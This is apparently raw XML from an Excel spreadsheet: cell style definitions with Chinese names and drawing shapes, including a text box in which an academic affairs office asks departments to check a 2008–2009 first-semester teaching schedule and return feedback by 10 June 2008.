    <xf numFmtId="184" fontId="3" fillId="0" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>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11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="202">
    <cellStyle name="20% - 强调文字颜色 1 2" xfId="1"/>
    <cellStyle name="20% - 强调文字颜色 1 2 2" xfId="2"/>
    <cellStyle name="20% - 强调文字颜色 1 3" xfId="3"/>
    <cellStyle name="20% - 强调文字颜色 1 3 2" xfId="4"/>
    <cellStyle name="20% - 强调文字颜色 2 2" xfId="5"/>
    <cellStyle name="20% - 强调文字颜色 2 2 2" xfId="6"/>
    <cellStyle name="20% - 强调文字颜色 2 3" xfId="7"/>
    <cellStyle name="20% - 强调文字颜色 2 3 2" xfId="8"/>
    <cellStyle name="20% - 强调文字颜色 3 2" xfId="9"/>
    <cellStyle name="20% - 强调文字颜色 3 2 2" xfId="10"/>
    <cellStyle name="20% - 强调文字颜色 3 3" xfId="11"/>
    <cellStyle name="20% - 强调文字颜色 3 3 2" xfId="12"/>
    <cellStyle name="20% - 强调文字颜色 4 2" xfId="13"/>
    <cellStyle name="20% - 强调文字颜色 4 2 2" xfId="14"/>
    <cellStyle name="20% - 强调文字颜色 4 3" xfId="15"/>
    <cellStyle name="20% - 强调文字颜色 4 3 2" xfId="16"/>
    <cellStyle name="20% - 强调文字颜色 5 2" xfId="17"/>
    <cellStyle name="20% - 强调文字颜色 5 2 2" xfId="18"/>
    <cellStyle name="20% - 强调文字颜色 5 3" xfId="19"/>
    <cellStyle name="20% - 强调文字颜色 5 3 2" xfId="20"/>
    <cellStyle name="20% - 强调文字颜色 6 2" xfId="21"/>
    <cellStyle name="20% - 强调文字颜色 6 2 2" xfId="22"/>
    <cellStyle name="20% - 强调文字颜色 6 3" xfId="23"/>
    <cellStyle name="20% - 强调文字颜色 6 3 2" xfId="24"/>
    <cellStyle name="40% - 强调文字颜色 1 2" xfId="25"/>
    <cellStyle name="40% - 强调文字颜色 1 2 2" xfId="26"/>
    <cellStyle name="40% - 强调文字颜色 1 3" xfId="27"/>
    <cellStyle name="40% - 强调文字颜色 1 3 2" xfId="28"/>
    <cellStyle name="40% - 强调文字颜色 2 2" xfId="29"/>
    <cellStyle name="40% - 强调文字颜色 2 2 2" xfId="30"/>
    <cellStyle name="40% - 强调文字颜色 2 3" xfId="31"/>
    <cellStyle name="40% - 强调文字颜色 2 3 2" xfId="32"/>
    <cellStyle name="40% - 强调文字颜色 3 2" xfId="33"/>
    <cellStyle name="40% - 强调文字颜色 3 2 2" xfId="34"/>
    <cellStyle name="40% - 强调文字颜色 3 3" xfId="35"/>
    <cellStyle name="40% - 强调文字颜色 3 3 2" xfId="36"/>
    <cellStyle name="40% - 强调文字颜色 4 2" xfId="37"/>
    <cellStyle name="40% - 强调文字颜色 4 2 2" xfId="38"/>
    <cellStyle name="40% - 强调文字颜色 4 3" xfId="39"/>
    <cellStyle name="40% - 强调文字颜色 4 3 2" xfId="40"/>
    <cellStyle name="40% - 强调文字颜色 5 2" xfId="41"/>
    <cellStyle name="40% - 强调文字颜色 5 2 2" xfId="42"/>
    <cellStyle name="40% - 强调文字颜色 5 3" xfId="43"/>
    <cellStyle name="40% - 强调文字颜色 5 3 2" xfId="44"/>
    <cellStyle name="40% - 强调文字颜色 6 2" xfId="45"/>
    <cellStyle name="40% - 强调文字颜色 6 2 2" xfId="46"/>
    <cellStyle name="40% - 强调文字颜色 6 3" xfId="47"/>
    <cellStyle name="40% - 强调文字颜色 6 3 2" xfId="48"/>
    <cellStyle name="60% - 强调文字颜色 1 2" xfId="49"/>
    <cellStyle name="60% - 强调文字颜色 1 2 2" xfId="50"/>
    <cellStyle name="60% - 强调文字颜色 1 3" xfId="51"/>
    <cellStyle name="60% - 强调文字颜色 1 3 2" xfId="52"/>
    <cellStyle name="60% - 强调文字颜色 2 2" xfId="53"/>
    <cellStyle name="60% - 强调文字颜色 2 2 2" xfId="54"/>
    <cellStyle name="60% - 强调文字颜色 2 3" xfId="55"/>
    <cellStyle name="60% - 强调文字颜色 2 3 2" xfId="56"/>
    <cellStyle name="60% - 强调文字颜色 3 2" xfId="57"/>
    <cellStyle name="60% - 强调文字颜色 3 2 2" xfId="58"/>
    <cellStyle name="60% - 强调文字颜色 3 3" xfId="59"/>
    <cellStyle name="60% - 强调文字颜色 3 3 2" xfId="60"/>
    <cellStyle name="60% - 强调文字颜色 4 2" xfId="61"/>
    <cellStyle name="60% - 强调文字颜色 4 2 2" xfId="62"/>
    <cellStyle name="60% - 强调文字颜色 4 3" xfId="63"/>
    <cellStyle name="60% - 强调文字颜色 4 3 2" xfId="64"/>
    <cellStyle name="60% - 强调文字颜色 5 2" xfId="65"/>
    <cellStyle name="60% - 强调文字颜色 5 2 2" xfId="66"/>
    <cellStyle name="60% - 强调文字颜色 5 3" xfId="67"/>
    <cellStyle name="60% - 强调文字颜色 5 3 2" xfId="68"/>
    <cellStyle name="60% - 强调文字颜色 6 2" xfId="69"/>
    <cellStyle name="60% - 强调文字颜色 6 2 2" xfId="70"/>
    <cellStyle name="60% - 强调文字颜色 6 3" xfId="71"/>
    <cellStyle name="60% - 强调文字颜色 6 3 2" xfId="72"/>
    <cellStyle name="标题 1 2" xfId="73"/>
    <cellStyle name="标题 1 2 2" xfId="74"/>
    <cellStyle name="标题 1 3" xfId="75"/>
    <cellStyle name="标题 1 3 2" xfId="76"/>
    <cellStyle name="标题 2 2" xfId="77"/>
    <cellStyle name="标题 2 2 2" xfId="78"/>
    <cellStyle name="标题 2 3" xfId="79"/>
    <cellStyle name="标题 2 3 2" xfId="80"/>
    <cellStyle name="标题 3 2" xfId="81"/>
    <cellStyle name="标题 3 2 2" xfId="82"/>
    <cellStyle name="标题 3 3" xfId="83"/>
    <cellStyle name="标题 3 3 2" xfId="84"/>
    <cellStyle name="标题 4 2" xfId="85"/>
    <cellStyle name="标题 4 2 2" xfId="86"/>
    <cellStyle name="标题 4 3" xfId="87"/>
    <cellStyle name="标题 4 3 2" xfId="88"/>
    <cellStyle name="标题 5" xfId="89"/>
    <cellStyle name="标题 5 2" xfId="90"/>
    <cellStyle name="标题 6" xfId="91"/>
    <cellStyle name="标题 6 2" xfId="92"/>
    <cellStyle name="差 2" xfId="93"/>
    <cellStyle name="差 2 2" xfId="94"/>
    <cellStyle name="差 3" xfId="95"/>
    <cellStyle name="差 3 2" xfId="96"/>
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="常规 10" xfId="97"/>
    <cellStyle name="常规 11" xfId="98"/>
    <cellStyle name="常规 2" xfId="99"/>
    <cellStyle name="常规 2 2" xfId="100"/>
    <cellStyle name="常规 2 2 2" xfId="101"/>
    <cellStyle name="常规 2 2 2 2" xfId="102"/>
    <cellStyle name="常规 2 2 3" xfId="103"/>
    <cellStyle name="常规 2 2 3 2" xfId="104"/>
    <cellStyle name="常规 2 2 4" xfId="105"/>
    <cellStyle name="常规 2 3" xfId="106"/>
    <cellStyle name="常规 2 3 2" xfId="107"/>
    <cellStyle name="常规 2 4" xfId="108"/>
    <cellStyle name="常规 3" xfId="109"/>
    <cellStyle name="常规 3 2" xfId="110"/>
    <cellStyle name="常规 3 2 2" xfId="111"/>
    <cellStyle name="常规 3 2 2 2" xfId="112"/>
    <cellStyle name="常规 3 2 3" xfId="113"/>
    <cellStyle name="常规 3 2 3 2" xfId="114"/>
    <cellStyle name="常规 3 2 4" xfId="115"/>
    <cellStyle name="常规 3 3" xfId="116"/>
    <cellStyle name="常规 3 3 2" xfId="117"/>
    <cellStyle name="常规 3 4" xfId="118"/>
    <cellStyle name="常规 4" xfId="119"/>
    <cellStyle name="常规 4 2" xfId="120"/>
    <cellStyle name="常规 4 2 2" xfId="121"/>
    <cellStyle name="常规 4 3" xfId="122"/>
    <cellStyle name="常规 4 3 2" xfId="123"/>
    <cellStyle name="常规 4 4" xfId="124"/>
    <cellStyle name="常规 5" xfId="125"/>
    <cellStyle name="常规 5 2" xfId="126"/>
    <cellStyle name="常规 6" xfId="127"/>
    <cellStyle name="常规 6 2" xfId="128"/>
    <cellStyle name="常规 8" xfId="129"/>
    <cellStyle name="常规 9" xfId="130"/>
    <cellStyle name="常规_2008～20091进程表" xfId="131"/>
    <cellStyle name="常规_norma1" xfId="132"/>
    <cellStyle name="好 2" xfId="133"/>
    <cellStyle name="好 2 2" xfId="134"/>
    <cellStyle name="好 3" xfId="135"/>
    <cellStyle name="好 3 2" xfId="136"/>
    <cellStyle name="汇总 2" xfId="137"/>
    <cellStyle name="汇总 2 2" xfId="138"/>
    <cellStyle name="汇总 3" xfId="139"/>
    <cellStyle name="汇总 3 2" xfId="140"/>
    <cellStyle name="计算 2" xfId="141"/>
    <cellStyle name="计算 2 2" xfId="142"/>
    <cellStyle name="计算 3" xfId="143"/>
    <cellStyle name="计算 3 2" xfId="144"/>
    <cellStyle name="检查单元格 2" xfId="145"/>
    <cellStyle name="检查单元格 2 2" xfId="146"/>
    <cellStyle name="检查单元格 3" xfId="147"/>
    <cellStyle name="检查单元格 3 2" xfId="148"/>
    <cellStyle name="解释性文本 2" xfId="149"/>
    <cellStyle name="解释性文本 2 2" xfId="150"/>
    <cellStyle name="解释性文本 3" xfId="151"/>
    <cellStyle name="解释性文本 3 2" xfId="152"/>
    <cellStyle name="警告文本 2" xfId="153"/>
    <cellStyle name="警告文本 2 2" xfId="154"/>
    <cellStyle name="警告文本 3" xfId="155"/>
    <cellStyle name="警告文本 3 2" xfId="156"/>
    <cellStyle name="链接单元格 2" xfId="157"/>
    <cellStyle name="链接单元格 2 2" xfId="158"/>
    <cellStyle name="链接单元格 3" xfId="159"/>
    <cellStyle name="链接单元格 3 2" xfId="160"/>
    <cellStyle name="强调文字颜色 1 2" xfId="161"/>
    <cellStyle name="强调文字颜色 1 2 2" xfId="162"/>
    <cellStyle name="强调文字颜色 1 3" xfId="163"/>
    <cellStyle name="强调文字颜色 1 3 2" xfId="164"/>
    <cellStyle name="强调文字颜色 2 2" xfId="165"/>
    <cellStyle name="强调文字颜色 2 2 2" xfId="166"/>
    <cellStyle name="强调文字颜色 2 3" xfId="167"/>
    <cellStyle name="强调文字颜色 2 3 2" xfId="168"/>
    <cellStyle name="强调文字颜色 3 2" xfId="169"/>
    <cellStyle name="强调文字颜色 3 2 2" xfId="170"/>
    <cellStyle name="强调文字颜色 3 3" xfId="171"/>
    <cellStyle name="强调文字颜色 3 3 2" xfId="172"/>
    <cellStyle name="强调文字颜色 4 2" xfId="173"/>
    <cellStyle name="强调文字颜色 4 2 2" xfId="174"/>
    <cellStyle name="强调文字颜色 4 3" xfId="175"/>
    <cellStyle name="强调文字颜色 4 3 2" xfId="176"/>
    <cellStyle name="强调文字颜色 5 2" xfId="177"/>
    <cellStyle name="强调文字颜色 5 2 2" xfId="178"/>
    <cellStyle name="强调文字颜色 5 3" xfId="179"/>
    <cellStyle name="强调文字颜色 5 3 2" xfId="180"/>
    <cellStyle name="强调文字颜色 6 2" xfId="181"/>
    <cellStyle name="强调文字颜色 6 2 2" xfId="182"/>
    <cellStyle name="强调文字颜色 6 3" xfId="183"/>
    <cellStyle name="强调文字颜色 6 3 2" xfId="184"/>
    <cellStyle name="适中 2" xfId="185"/>
    <cellStyle name="适中 2 2" xfId="186"/>
    <cellStyle name="适中 3" xfId="187"/>
    <cellStyle name="适中 3 2" xfId="188"/>
    <cellStyle name="输出 2" xfId="189"/>
    <cellStyle name="输出 2 2" xfId="190"/>
    <cellStyle name="输出 3" xfId="191"/>
    <cellStyle name="输出 3 2" xfId="192"/>
    <cellStyle name="输入 2" xfId="193"/>
    <cellStyle name="输入 2 2" xfId="194"/>
    <cellStyle name="输入 3" xfId="195"/>
    <cellStyle name="输入 3 2" xfId="196"/>
    <cellStyle name="样式 1" xfId="197"/>
    <cellStyle name="注释 2" xfId="198"/>
    <cellStyle name="注释 2 2" xfId="199"/>
    <cellStyle name="注释 3" xfId="200"/>
    <cellStyle name="注释 3 2" xfId="2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7620</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>7620</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>350520</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="19956" name="Line 7662">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F9461A0-5613-4BA5-9135-431CD28AB5DD}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr>
          <a:spLocks noChangeShapeType="1"/>
        </xdr:cNvSpPr>
      </xdr:nvSpPr>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="4419600" y="1257300"/>
          <a:ext cx="78486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0</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>7620</xdr:rowOff>
    </xdr:to>
    <xdr:grpSp>
      <xdr:nvGrpSpPr>
        <xdr:cNvPr id="21131" name="组合 1">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F982C65F-58CF-474C-86BB-F4186295B81F}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvGrpSpPr>
          <a:grpSpLocks/>
        </xdr:cNvGrpSpPr>
      </xdr:nvGrpSpPr>
      <xdr:grpSpPr bwMode="auto">
        <a:xfrm>
          <a:off x="1920240" y="266700"/>
          <a:ext cx="1082040" cy="7620"/>
          <a:chOff x="1262" y="1865"/>
          <a:chExt cx="3060" cy="1560"/>
        </a:xfrm>
      </xdr:grpSpPr>
      <xdr:sp macro="" textlink="">
        <xdr:nvSpPr>
          <xdr:cNvPr id="21138" name="直线 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E373AB9F-13DF-4D16-9C68-B011BF7A649B}"/>
              </a:ext>
            </a:extLst>
          </xdr:cNvPr>
          <xdr:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </xdr:cNvSpPr>
        </xdr:nvSpPr>
        <xdr:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1279" y="1876"/>
            <a:ext cx="3041" cy="30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39" name="直线 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CD4A01D-5225-46F1-A777-ED108F81F78B}"/>
              </a:ext>
            </a:extLst>
          </xdr:cNvPr>
          <xdr:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </xdr:cNvSpPr>
        </xdr:nvSpPr>
        <xdr:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1262" y="1865"/>
            <a:ext cx="3058" cy="6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40" name="直线 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D44710C-13AA-410D-A19A-26C3B6E3CBE9}"/>
              </a:ext>
            </a:extLst>
          </xdr:cNvPr>
          <xdr:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </xdr:cNvSpPr>
        </xdr:nvSpPr>
        <xdr:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1262" y="1865"/>
            <a:ext cx="3058" cy="125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41" name="直线 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831CE0A3-02A0-46D2-BF2C-772C56485EAD}"/>
              </a:ext>
            </a:extLst>
          </xdr:cNvPr>
          <xdr:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </xdr:cNvSpPr>
        </xdr:nvSpPr>
        <xdr:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1262" y="1865"/>
            <a:ext cx="3060" cy="15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xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>259080</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:to>
    <xdr:grpSp>
      <xdr:nvGrpSpPr>
        <xdr:cNvPr id="21132" name="组合 6">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645172F1-D4AD-41C6-9BF9-08BC2B4BA4A1}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvGrpSpPr>
          <a:grpSpLocks/>
        </xdr:cNvGrpSpPr>
      </xdr:nvGrpSpPr>
      <xdr:grpSpPr bwMode="auto">
        <a:xfrm>
          <a:off x="7620" y="259080"/>
          <a:ext cx="2994660" cy="762000"/>
          <a:chOff x="1262" y="1865"/>
          <a:chExt cx="3060" cy="1560"/>
        </a:xfrm>
      </xdr:grpSpPr>
      <xdr:sp macro="" textlink="">
        <xdr:nvSpPr>
          <xdr:cNvPr id="21134" name="直线 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85A9D090-8DA6-4FF8-9F22-38A716CB5133}"/>
              </a:ext>
            </a:extLst>
          </xdr:cNvPr>
          <xdr:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </xdr:cNvSpPr>
        </xdr:nvSpPr>
        <xdr:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1279" y="1876"/>
            <a:ext cx="3041" cy="30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35" name="直线 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E73A00BB-DE33-4C8D-9153-E0D6138A5F17}"/>
              </a:ext>
            </a:extLst>
          </xdr:cNvPr>
          <xdr:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </xdr:cNvSpPr>
        </xdr:nvSpPr>
        <xdr:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1262" y="1865"/>
            <a:ext cx="3058" cy="63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36" name="直线 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2E99960-50C4-4BD8-9F73-754F3CBFD4CE}"/>
              </a:ext>
            </a:extLst>
          </xdr:cNvPr>
          <xdr:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </xdr:cNvSpPr>
        </xdr:nvSpPr>
        <xdr:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1262" y="1865"/>
            <a:ext cx="3058" cy="125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137" name="直线 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{325F0615-D831-4806-BAE1-E7FBE7A54AFF}"/>
              </a:ext>
            </a:extLst>
          </xdr:cNvPr>
          <xdr:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </xdr:cNvSpPr>
        </xdr:nvSpPr>
        <xdr:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1262" y="1865"/>
            <a:ext cx="3060" cy="15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0</xdr:colOff>
      <xdr:row>387</xdr:row>
      <xdr:rowOff>111760</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>31</xdr:col>
      <xdr:colOff>157496</xdr:colOff>
      <xdr:row>401</xdr:row>
      <xdr:rowOff>9556</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="2" name="文本框 15">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F99543F-7058-4178-9A69-210E735614E7}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr txBox="1">
          <a:spLocks noChangeArrowheads="1"/>
        </xdr:cNvSpPr>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1924050" y="6134100"/>
          <a:ext cx="6562725" cy="2543175"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>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各学院：</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1300"/>
            </a:lnSpc>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　　请传阅本表，各系根据培养计划仔细核对</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>2008</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>～</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>2009</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>第一学期进程，意见反馈截止时间</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>2008</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>年</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>6</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>月</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>10</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>日。</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l" rtl="0">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lnSpc>
              <a:spcPts val="1300"/>
            </a:lnSpc>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　　　                   　　　　　　　　　　　　      </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>aaaaaaaaaa</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>教务科　　　　                         </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>1111                                                        1                                                           2009</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>年</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>6</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>月</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>1</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            </a:rPr>
            <a:t>日</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l" rtl="0">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lnSpc>
              <a:spcPts val="1300"/>
            </a:lnSpc>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系主任签字：</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l" rtl="0">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lnSpc>
              <a:spcPts val="1300"/>
            </a:lnSpc>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defRPr sz="1000"/>
          </a:pPr>
